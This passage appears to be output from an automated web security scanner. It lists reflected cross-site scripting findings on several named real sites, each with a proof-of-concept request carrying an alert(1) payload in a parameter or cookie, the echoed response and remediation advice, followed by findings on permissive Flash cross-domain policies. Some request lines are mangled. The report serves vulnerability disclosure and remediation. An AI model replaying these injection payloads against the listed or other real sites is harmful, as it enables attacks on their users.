2.165. http://www.ubmlive.com/image/image_gallery [groupId parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ubmlive.com
Path:
/image/image_gallery
Issue detail
The value of the groupId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 394e7'-alert(1)-'dccd8ae7337 was submitted in the groupId parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /image/image_gallery?uuid=e451fe3b-d86e-487e-ace5-4559ef1f2ab1&groupId=1482687394e7'-alert(1)-'dccd8ae7337 &t=1298997241996 HTTP/1.1;q=0.3
Response
HTTP/1.1 404 Not Found...[SNIP]... .ubmlive.com/image/image_gallery?uuid=e451fe3b-d86e-487e-ace5-4559ef1f2ab1&groupId=1482687394e7'-alert(1)-'dccd8ae7337 &t=1298997241996';?uuid=e451fe3b d86e 487e ace5 4559ef1f2ab1&groupId=1482687394e7' alert(1) 'dc...[SNIP]...
2.166. http://www.ubmlive.com/image/image_gallery [uuid parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ubmlive.com
Path:
/image/image_gallery
Issue detail
The value of the uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d5b1'-alert(1)-'01593b2eb8d was submitted in the uuid parameter. This input was echoed unmodified in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /image/image_gallery?uuid=e451fe3b-d86e-487e-ace5-4559ef1f2ab18d5b1'-alert(1)-'01593b2eb8d &groupId=1482687&t=1298997241996 HTTP/1.1;q=0.3
Response
HTTP/1.1 404 Not Found...[SNIP]... .ubmlive.com/image/image_gallery?uuid=e451fe3b-d86e-487e-ace5-4559ef1f2ab18d5b1'-alert(1)-'01593b2eb8d &groupId=1482687&t=1298997241996';?uuid=e451fe3b d86e 487e ace5 4559ef1f2ab18d5b1' alert(1) '01...[SNIP]...
2.167. http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7 [bc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.zoomerang.com
Path:
/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7
Issue detail
The value of the bc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0b68\'%3balert(1)//5be21be8d8c was submitted in the bc parameter. This input was echoed as c0b68\\';alert(1)//5be21be8d8c in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7?width=177&bc=226DB1c0b68\'%3balert(1)//5be21be8d8c &bgc=CFE8FC&fc=000000&fs=10&rc=False&rp=True&trc=False&shn=True&tb=False&pr=False HTTP/1.1/Products/MDaemon-Email-Server-Windows/?gclid=CNC9_rqUoqsCFeUZQgodLn8qig;q=0.3
Response
HTTP/1.1 200 OK.zoomerang.com/Shared/JavaScript/supersleight-min.js"></script> ...[SNIP]... :18px;background-color:#226DB1c0b68\\';alert(1)//5be21be8d8c ;border-right:#797979 1px solid;font-size:6px;margin:0;">...[SNIP]...
2.168. http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7 [bgc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.zoomerang.com
Path:
/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7
Issue detail
The value of the bgc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c49c\'%3balert(1)//b3f6a0759b9 was submitted in the bgc parameter. This input was echoed as 3c49c\\';alert(1)//b3f6a0759b9 in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7?width=177&bc=226DB1&bgc=CFE8FC3c49c\'%3balert(1)//b3f6a0759b9 &fc=000000&fs=10&rc=False&rp=True&trc=False&shn=True&tb=False&pr=False HTTP/1.1/Products/MDaemon-Email-Server-Windows/?gclid=CNC9_rqUoqsCFeUZQgodLn8qig;q=0.3
Response
HTTP/1.1 200 OK.zoomerang.com/Shared/JavaScript/supersleight-min.js"></script> ...[SNIP]... ;background-color:#CFE8FC3c49c\\';alert(1)//b3f6a0759b9 ;border:1px solid #D4D4D4;font-family:Arial, Verdana;color:#000000;width:177px;background-image:url(https://www.zoomerang.com/Shared/App_Themes/Main/Images/widget/transparent_overlay_small.png);backgro...[SNIP]...
2.169. http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7 [fc parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.zoomerang.com
Path:
/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7
Issue detail
The value of the fc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4db71\'%3balert(1)//f8765cd7da8 was submitted in the fc parameter. This input was echoed as 4db71\\';alert(1)//f8765cd7da8 in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7?width=177&bc=226DB1&bgc=CFE8FC&fc=0000004db71\'%3balert(1)//f8765cd7da8 &fs=10&rc=False&rp=True&trc=False&shn=True&tb=False&pr=False HTTP/1.1/Products/MDaemon-Email-Server-Windows/?gclid=CNC9_rqUoqsCFeUZQgodLn8qig;q=0.3
Response
HTTP/1.1 200 OK.zoomerang.com/Shared/JavaScript/supersleight-min.js"></script> ...[SNIP]... ;background-color:#CFE8FC;border:1px solid #D4D4D4;font-family:Arial, Verdana;color:#0000004db71\\';alert(1)//f8765cd7da8 ;width:177px;background-image:url(https://www.zoomerang.com/Shared/App_Themes/Main/Images/widget/transparent_overlay_small.png);background-repeat: no-repeat;">...[SNIP]...
2.170. http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7 [fs parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.zoomerang.com
Path:
/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7
Issue detail
The value of the fs request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae4c6\'%3balert(1)//bb990c2bcff was submitted in the fs parameter. This input was echoed as ae4c6\\';alert(1)//bb990c2bcff in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7?width=177&bc=226DB1&bgc=CFE8FC&fc=000000&fs=10ae4c6\'%3balert(1)//bb990c2bcff &rc=False&rp=True&trc=False&shn=True&tb=False&pr=False HTTP/1.1/Products/MDaemon-Email-Server-Windows/?gclid=CNC9_rqUoqsCFeUZQgodLn8qig;q=0.3
Response
HTTP/1.1 200 OK.zoomerang.com/Shared/JavaScript/supersleight-min.js"></script> ...[SNIP]... ae4c6\\';alert(1)//bb990c2bcff px;margin:10px;border:none;">...[SNIP]...
2.171. http://www.zoomerang.com/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7 [width parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.zoomerang.com
Path:
/Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7
Issue detail
The value of the width request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9effc\'%3balert(1)//471bd0ffa78 was submitted in the width parameter. This input was echoed as 9effc\\';alert(1)//471bd0ffa78 in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Shared/Report/L22XZG54CT2Z/QuestionResultsWidget/check_7?width=1779effc\'%3balert(1)//471bd0ffa78 &bc=226DB1&bgc=CFE8FC&fc=000000&fs=10&rc=False&rp=True&trc=False&shn=True&tb=False&pr=False HTTP/1.1/Products/MDaemon-Email-Server-Windows/?gclid=CNC9_rqUoqsCFeUZQgodLn8qig;q=0.3
Response
HTTP/1.1 200 OK.zoomerang.com/Shared/JavaScript/supersleight-min.js"></script> ...[SNIP]... ;background-color:#CFE8FC;border:1px solid #D4D4D4;font-family:Arial, Verdana;color:#000000;width:1779effc\\';alert(1)//471bd0ffa78 px;background-image:url(https://www.zoomerang.com/Shared/App_Themes/Main/Images/widget/transparent_overlay_small.png);background-repeat: no-repeat;">...[SNIP]...
2.172. http://livechat.iadvize.com/chat_init.js [Referer HTTP header]
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://livechat.iadvize.com
Path:
/chat_init.js
Issue detail
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload d9078<a>e959884fd62 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /chat_init.js?sid=1821 HTTP/1.1/search?hl=en&q=d9078<a>e959884fd62 ;q=0.3
Response
HTTP/1.1 200 OK/livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"aeffd3c6b449e3ce04e736ab952c62; expires=Sun, 15-Sep-2013 15:27:08 GMT; path=/%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A0%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A3%2C%22connectionTime%22%3A1316186809%2C%22navTime%22%3A19000%2C%22origin_site%22%3A%22http%3A%5C%2F%5C%2Fwww.google.com%5C%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dsmtp+server%22%2C%22origin%22%3A%22search+engine%22%2C%22refengine%22%3A%22Google%22%2C%22refkeyword%22%3A%22smtp+server%22%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.google.com%5C%2Fsearch%3Fhl%3Den%26q%3Dd9078%3Ca%3Ee959884fd62%22%2C%22timeElapsed%22%3A0.32%7D; path=/.userAgent) && !(/Chrome/.test(navigator.userAgent))) {ByTagName( 'BODY' )[ 0 ];...[SNIP]... /search?sourceid=chrome&ie=UTF-8&q=smtp server","origin":"search engine","refengine":"Google","refkeyword":"smtp server","referrer_lastPage":"http:\/\/www.google.com\/search?hl=en&q=d9078<a>e959884fd62 ","timeElapsed":0.32};for(var v in iAdvize.vProf){iAdvize.vStats[v]=iAdvize.vProf[v];}.layout!='fb'){iAdvize.vStats['actualURI']=document.location.href;}'actua...[SNIP]...
2.173. http://a.collective-media.net/cmadj/ds.home/default [cli cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/ds.home/default
Issue detail
The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2879e'%3balert(1)//6361e5175a1 was submitted in the cli cookie. This input was echoed as 2879e';alert(1)//6361e5175a1 in the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /cmadj/ds.home/default;cmn=wfm;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;pos=top;u=ds;dcopt=ist;ptile=1;s=ds.home;z=default;net=wfm;ord=110916093024416?;ord1=216411;cmpgurl=http%253A//www.drugstore.com/? HTTP/1.1;q=0.72879e'%3balert(1)//6361e5175a1 ; dc=sea
Response
HTTP/1.1 200 OK.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"2879e';alert(1)//6361e5175a1 ';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this...[SNIP]...
2.174. http://livechat.iadvize.com/chat_init.js [vuid cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://livechat.iadvize.com
Path:
/chat_init.js
Issue detail
The value of the vuid cookie is copied into the HTML document as plain text between tags. The payload 7f265<script>alert(1)</script>cba43038c81 was submitted in the vuid cookie. This input was echoed unmodified in the application's response.
Request
GET /chat_init.js?sid=1821 HTTP/1.1;q=0.3aeffd3c6b449e3ce04e736ab952c627f265<script>alert(1)</script>cba43038c81 ; 1821vvc=1
Response
HTTP/1.1 200 OK/livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"aeffd3c6b449e3ce04e736ab952c627f265%3Cscript%3Ealert%281%29%3C%2Fscript%3Ecba43038c81; expires=Sun, 15-Sep-2013 18:44:59 GMT; path=/%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A1%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A22%2C%22connectionTime%22%3A1316198661%2C%22navTime%22%3A38000%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2F%22%2C%22timeElapsed%22%3A0.63%7D; path=/.userAgent) && !(/Chrome/.test(navigator.userAgent))) {ByTagName( 'BODY' )[ 0 ];...[SNIP]... .com/saveuid.php?sid=1821&vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c627f265<script>alert(1)</script>cba43038c81 ';...[SNIP]...
2.175. https://support.socketlabs.com/index.php/Base/User/Login [SWIFT_client cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/index.php/Base/User/Login
Issue detail
The value of the SWIFT_client cookie is copied into the HTML document as plain text between tags. The payload 3929e<script>alert(1)</script>4d502bdc670 was submitted in the SWIFT_client cookie. This input was echoed unmodified in the application's response.
Request
POST /index.php/Base/User/Login HTTP/1.1.socketlabs.com/.socketlabs.com-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=; SWIFT_client=3929e<script>alert(1)</script>4d502bdc670 ; SWIFT_sessionid40=es1qz018py0u704q2o1k7083rf1lm0bf%2FKnowledgebase%2FHomeIndex%2FIndex&scemail=Your+email+address&scpassword=
Response
HTTP/1.1 200 OK%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; expires=Sat, 15-Sep-2012 15:23:21 GMT; path=/; domain=support.socketlabs.com...[SNIP]... 3929e<script>alert(1)</script>4d502bdc670 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]...
2.176. https://support.socketlabs.com/index.php/Base/UserRegistration/Register [SWIFT_client cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/index.php/Base/UserRegistration/Register
Issue detail
The value of the SWIFT_client cookie is copied into the HTML document as plain text between tags. The payload 12dc8<script>alert(1)</script>00e1e0fd60f was submitted in the SWIFT_client cookie. This input was echoed unmodified in the application's response.
Request
GET /index.php/Base/UserRegistration/Register HTTP/1.1.socketlabs.com/index.php/Base/User/Login/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=; SWIFT_client=12dc8<script>alert(1)</script>00e1e0fd60f ; SWIFT_sessionid40=es1qz018py0u704q2o1k7083rf1lm0bf
Response
HTTP/1.1 200 OK%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; expires=Sat, 15-Sep-2012 15:23:18 GMT; path=/; domain=support.socketlabs.com...[SNIP]... 12dc8<script>alert(1)</script>00e1e0fd60f <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]...
2.177. https://support.socketlabs.com/index.php/Base/UserRegistration/RegisterSubmit [SWIFT_client cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/index.php/Base/UserRegistration/RegisterSubmit
Issue detail
The value of the SWIFT_client cookie is copied into the HTML document as plain text between tags. The payload a1ea1<script>alert(1)</script>4527f5cb25c was submitted in the SWIFT_client cookie. This input was echoed unmodified in the application's response.
Request
POST /index.php/Base/UserRegistration/RegisterSubmit HTTP/1.1.socketlabs.com/index.php/Base/UserRegistration/Register.socketlabs.comormBoundaryKmcBgFc5dd4a1T1r/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=; SWIFT_client=a1ea1<script>alert(1)</script>4527f5cb25c ; SWIFT_sessionid40=es1qz018py0u704q2o1k7083rf1lm0bfdaryKmcBgFc5dd4a1T1rdaryKmcBgFc5dd4a1T1r...[SNIP]...
Response
HTTP/1.1 200 OK%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; expires=Sat, 15-Sep-2012 15:24:23 GMT; path=/; domain=support.socketlabs.com...[SNIP]... a1ea1<script>alert(1)</script>4527f5cb25c <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]...
2.178. https://support.socketlabs.com/rss [SWIFT_client cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/rss
Issue detail
The value of the SWIFT_client cookie is copied into the HTML document as plain text between tags. The payload 16d5b<script>alert(1)</script>5f575fa2724 was submitted in the SWIFT_client cookie. This input was echoed unmodified in the application's response.
Request
GET /rss?63681bd8 HTTP/1.1.socketlabs.com/-urlencoded;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=; SWIFT_client=16d5b<script>alert(1)</script>5f575fa2724 ; SWIFT_sessionid40=es1qz018py0u704q2o1k7083rf1lm0bf
Response (redirected)
HTTP/1.0 404 Not Found%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; expires=Sat, 15-Sep-2012 15:22:56 GMT; path=/; domain=support.socketlabs.com...[SNIP]... 16d5b<script>alert(1)</script>5f575fa2724 <div style="BACKGROUND: #f8ebeb; FONT: 13px Trebuchet MS, Verdana, Helvetica, Arial; BORDER: 1px SOLID #751616; PADDING: 10px; MARGIN: 5px;">...[SNIP]...
2.179. https://support.socketlabs.com/rss/ [SWIFT_client cookie]
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://support.socketlabs.com
Path:
/rss/
Issue detail
The value of the SWIFT_client cookie is copied into the HTML document as plain text between tags. The payload ca1b3<script>alert(1)</script>d8b8a3855c7 was submitted in the SWIFT_client cookie. This input was echoed unmodified in the application's response.
Request
GET /rss/?63681bd8 HTTP/1.1.socketlabs.com/-urlencoded;q=0.3PFIBO4BHUYTYMWQTGG1A999; wooMeta=ODUwNjQmMSYyJjI4OTYxOSYxMzE2MTg2Nzk5NDEwJjEzMTYxODcwODkwMjgmaHR0cCUzQSUyRiUyRnd3dy5nb29nbGUuY29tJTJGc2VhcmNoJTNGc291cmNlaWQlM0RjaHJvbWUlMjZpZSUzRFVURi04JTI2cSUzRHNtdHAlMkJzZXJ2ZXImMTAxJnNtdHArc2VydmVyJjUwMDI1OSYmJiY=; SWIFT_client=ca1b3<script>alert(1)</script>d8b8a3855c7 ; SWIFT_sessionid40=es1qz018py0u704q2o1k7083rf1lm0bf
Response
HTTP/1.0 404 Not Found%3A15%3A%22templategroupid%22%3Bs%3A1%3A%221%22%3B%7D; expires=Sat, 15-Sep-2012 15:22:24 GMT; path=/; domain=support.socketlabs.com...[SNIP]... ca1b3<script>alert(1)</script>d8b8a3855c7 <div style="BACKGROUND: #f8ebeb; FONT: 13px Trebuchet MS, Verdana, Helvetica, Arial; BORDER: 1px SOLID #751616; PADDING: 10px; MARGIN: 5px;">...[SNIP]...
2.180. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1 [AA002 cookie]
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://view.atdmt.com
Path:
/iaction/adoapn_AppNexusDemoActionTag_1
Issue detail
The value of the AA002 cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d2ac"><a>a5069e0a4f4 was submitted in the AA002 cookie. This input was echoed unmodified in the application's response.
Request
GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1.port25.com/smtp-server-software-2/?gclid=CL3QyvqJoqsCFSOAgwodRgln2A;q=0.31d2ac"><a>a5069e0a4f4 ; TOptOut=1; ach00=eb2a/1c72:ec40/2f33; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23
Response
HTTP/1.1 200 OK/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1314814617-33987501d2ac"><a>a5069e0a4f4 %7cMUID%3d3c386d14ba7b606a2dd16f7bb97b6008%7cTOptOut%3d1%7cEANON%3dA%253d0179022FMvh3YrnOeAXLQNmzAI0Agb6MEZrqWn99zaTqEFVb2jpZCBv5WstkgHMVIjxIXdZlhzQrurEv81-nL6cqmAMwi%2526E%253dFFF%2526W%253d1%22);" wi...[SNIP]...
3. Flash cross-domain policy
previous
next
There are 5 instances of this issue:
Issue background
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
3.1. http://imagesak.securepaynet.net/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://imagesak.securepaynet.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Request
GET /crossdomain.xml HTTP/1.0
Response
HTTP/1.0 200 OK.com/xml/dtds/cross-domain-policy.dtd">* " />...[SNIP]...
3.2. http://widget.uservoice.com/crossdomain.xml
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://widget.uservoice.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which allows access from any domain.
Request
GET /crossdomain.xml HTTP/1.0
Response
HTTP/1.0 200 OK/dtds/cross-domain-policy.dtd">.com -->...[SNIP]... * " />...[SNIP]...
3.3. http://googleads.g.doubleclick.net/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://googleads.g.doubleclick.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Request
GET /crossdomain.xml HTTP/1.0.net
Response
HTTP/1.0 200 OK/googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"-policy; charset=UTF-8.com/xml/dtds/cross-domain-policy.dtd">maps.gstatic.com " />maps.gstatic.cn " />*.googlesyndication.com *.google.com *.google.ae *.google.at *.google.be *.google.ca *.google.ch *.google.cn *.google.co.il *.google.co.in *.google.co.jp *.google.co.kr *.google.co.nz *.google.co.uk *.google.co.ve *.google.co.za *.google.com.ar *.google.com.au *.google.com.br *.google.com.gr *.google.com.hk *.google.com.ly *.google.com.mx *.google.com.my *.google.com.pe *.google.com.ph *.google.com.pk *.google.com.ru *.google.com.sg *.google.com.tr *.google.com.tw *.google.com.ua *.google.com.vn *.google.de *.google.dk *.google.es *.google.fi *.google.fr *.google.it *.google.lt *.google.lv *.google.nl *.google.no *.google.pl *.google.pt *.google.ro *.google.se *.google.sk *.youtube.com *.ytimg.com *.2mdn.net *.doubleclick.net " />*.doubleclick.com " />...[SNIP]...
3.4. http://static.ak.fbcdn.net/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://static.ak.fbcdn.net
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Request
GET /crossdomain.xml HTTP/1.0
Response
HTTP/1.0 200 OK-policy;charset=utf-8/dtds/cross-domain-policy.dtd">-policies="master-only" /...[SNIP]... s-static.facebook.com " />static.facebook.com " />static.api.ak.facebook.com " />*.static.ak.facebook.com s-static.thefacebook.com " />static.thefacebook.com " />static.api.ak.thefacebook.com " />*.static.ak.thefacebook.com *.static.ak.fbcdn.com " />s-static.ak.fbcdn.net " />*.static.ak.fbcdn.net " />s-static.ak.facebook.com " />www.facebook.com " />www.new.facebook.com " />register.facebook.com " />login.facebook.com " />ssl.facebook.com " />secure.facebook.com " />ssl.new.facebook.com " />...[SNIP]... fvr.facebook.com " />www.latest.facebook.com " />www.inyour.facebook.com " />www.beta.facebook.com " />...[SNIP]...
3.5. http://www.facebook.com/crossdomain.xml
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.facebook.com
Path:
/crossdomain.xml
Issue detail
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Request
GET /crossdomain.xml HTTP/1.0
Response
HTTP/1.0 200 OK-policy;charset=utf-8/dtds/cross-domain-policy.dtd">-policies="master-only" /...[SNIP]... s-static.facebook.com " />static.facebook.com " />static.api.ak.facebook.com " />*.static.ak.facebook.com " />s-static.thefacebook.com " />static.thefacebook.com " />static.api.ak.thefacebook.com " />*.static.ak.thefacebook.com *.static.ak.fbcdn.com s-static.ak.fbcdn.net " />*.static.ak.fbcdn.net s-static.ak.facebook.com " />...[SNIP]... www.new.facebook.com " />register.facebook.com " />login.facebook.com " />ssl.facebook.com " />secure.facebook.com " />ssl.new.facebook.com " />static.ak.fbcdn.net " />fvr.facebook.com " />www.latest.facebook.com " />www.inyour.facebook.com " />www.beta.facebook.com " />...[SNIP]...
4. Cleartext submission of password
previous
next
There are 2 instances of this issue:
Issue background
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.
Issue remediation
